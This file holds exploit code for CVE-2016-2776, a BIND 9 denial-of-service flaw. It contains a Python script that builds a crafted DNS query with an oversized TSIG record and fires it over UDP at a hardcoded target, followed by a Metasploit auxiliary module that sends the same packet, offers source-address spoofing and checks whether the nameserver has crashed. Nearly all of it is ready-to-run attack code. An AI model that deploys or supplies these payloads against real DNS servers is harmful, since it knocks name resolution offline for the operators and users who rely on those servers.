import socket import struct TARGET = ('192.168.200.10', 53) Q_A = 1 Q_TSIG = 250 DNS_MESSAGE_HEADERLEN = 12 def build_bind_nuke(question="\x06google\x03com\x00", udpsize=512): query_A = "\x8f\x65\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01" + question + int16(Q_A) + "\x00\x01" sweet_spot = udpsize - DNS_MESSAGE_HEADERLEN + 1 tsig_rr = build_tsig_rr(sweet_spot) return query_A + tsig_rr def int16(n): return struct.pack("!H", n) def build_tsig_rr(bind_demarshalled_size): signature_data = ("\x00\x00\x57\xeb\x80\x14\x01\x2c\x00\x10\xd2\x2b\x32\x13\xb0\x09" "\x46\x34\x21\x39\x58\x62\xf3\xd5\x9c\x8b\x8f\x65\x00\x00\x00\x00") tsig_rr_extra_fields = "\x00\xff\x00\x00\x00\x00" necessary_bytes = len(signature_data) + len(tsig_rr_extra_fields) necessary_bytes += 2 + 2 # length fields # from sizeof(TSIG RR) bytes conforming the TSIG RR # bind9 uses sizeof(TSIG RR) - 16 to build its own sign_name, algo_name = generate_padding(bind_demarshalled_size - necessary_bytes + 16) tsig_hdr = sign_name + int16(Q_TSIG) + tsig_rr_extra_fields tsig_data = algo_name + signature_data return tsig_hdr + int16(len(tsig_data)) + tsig_data def generate_padding(n): max_per_bucket = [0x3f, 0x3f, 0x3f, 0x3d, 0x3f, 0x3f, 0x3f, 0x3d] buckets = [1] * len(max_per_bucket) min_size = len(buckets) * 2 + 2 # 2 bytes for every bucket plus each null byte max_size = sum(max_per_bucket) + len(buckets) + 2 if not(min_size <= n <= max_size): raise RuntimeException("unsupported amount of bytes") curr_idx, n = 0, n - min_size while n > 0: next_n = max(n - (max_per_bucket[curr_idx] - 1), 0) buckets[curr_idx] = 1 + n - next_n n, curr_idx = next_n, curr_idx + 1 n_padding = lambda amount: chr(amount) + "A" * amount stringify = lambda sizes: "".join(map(n_padding, sizes)) + "\x00" return stringify(buckets[:4]), stringify(buckets[4:]) if __name__ == "__main__": bombita = build_bind_nuke() s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.sendto(bombita, TARGET) s.close() ''' ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'timeout' require 'socket' class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::Dos include Msf::Auxiliary::Report def initialize(info={}) super(update_info(info, 'Name' => 'BIND 9 DoS CVE-2016-2776', 'Description' => %q{ Denial of Service Bind 9 DNS Server CVE-2016-2776. Critical error condition which can occur when a nameserver is constructing a response. A defect in the rendering of messages into packets can cause named to exit with an assertion failure in buffer.c while constructing a response to a query that meets certain criteria. This assertion can be triggered even if the apparent source address isnt allowed to make queries. }, # Research and Original PoC - msf module author 'Author' => [ 'Martin Rocha', 'Ezequiel Tavella', 'Alejandro Parodi', 'Infobyte Research Team'], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2016-2776' ], [ 'URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html' ] ], 'DisclosureDate' => 'Sep 27 2016', 'DefaultOptions' => {'ScannerRecvWindow' => 0} )) register_options([ Opt::RPORT(53), OptAddress.new('SRC_ADDR', [false, 'Source address to spoof']) ]) deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT') end def check_server_status(ip, rport) res = "" sudp = UDPSocket.new sudp.send(valid_query, 0, ip, rport) begin Timeout.timeout(5) do res = sudp.recv(100) end rescue Timeout::Error end if(res.length==0) print_good("Exploit Success (Maybe, nameserver did not replied)") else print_error("Exploit Failed") end end def scan_host(ip) @flag_success = true print_status("Sending bombita (Specially crafted udp packet) to: "+ip) scanner_send(payload, ip, rport) check_server_status(ip, rport) end def get_domain domain = "\x06"+Rex::Text.rand_text_alphanumeric(6) org = "\x03"+Rex::Text.rand_text_alphanumeric(3) get_domain = domain+org end def payload query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 query += "\x00\x00" # Flags: 0x0000 Standard query query += "\x00\x01" # Questions: 1 query += "\x00\x00" # Answer RRs: 0 query += "\x00\x00" # Authority RRs: 0 query += "\x00\x01" # Additional RRs: 1 # Doman Name query += get_domain # Random DNS Name query += "\x00" # [End of name] query += "\x00\x01" # Type: A (Host Address) (1) query += "\x00\x01" # Class: IN (0x0001) # Aditional records. Name query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes query += "\x3d"+Rex::Text.rand_text_alphanumeric(61) query += "\x00" query += "\x00\xfa" # Type: TSIG (Transaction Signature) (250) query += "\x00\xff" # Class: ANY (0x00ff) query += "\x00\x00\x00\x00" # Time to live: 0 query += "\x00\xfc" # Data length: 252 # Algorithm Name query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes query += "\x1A"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes query += "\x00" # Rest of TSIG query += "\x00\x00"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan 1, 1970 03:15:07.000000000 ART query += "\x01\x2c" # Fudge: 300 query += "\x00\x10" # MAC Size: 16 query += Rex::Text.rand_text_alphanumeric(16) # MAC query += "\x8f\x65" # Original Id: 36709 query += "\x00\x00" # Error: No error (0) query += "\x00\x00" # Other len: 0 end def valid_query query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 query += "\x00\x00" # Flags: 0x0000 Standard query query += "\x00\x01" # Questions: 1 query += "\x00\x00" # Answer RRs: 0 query += "\x00\x00" # Authority RRs: 0 query += "\x00\x00" # Additional RRs: 0 # Doman Name query += get_domain # Random DNS Name query += "\x00" # [End of name] query += "\x00\x01" # Type: A (Host Address) (1) query += "\x00\x01" # Class: IN (0x0001)s end end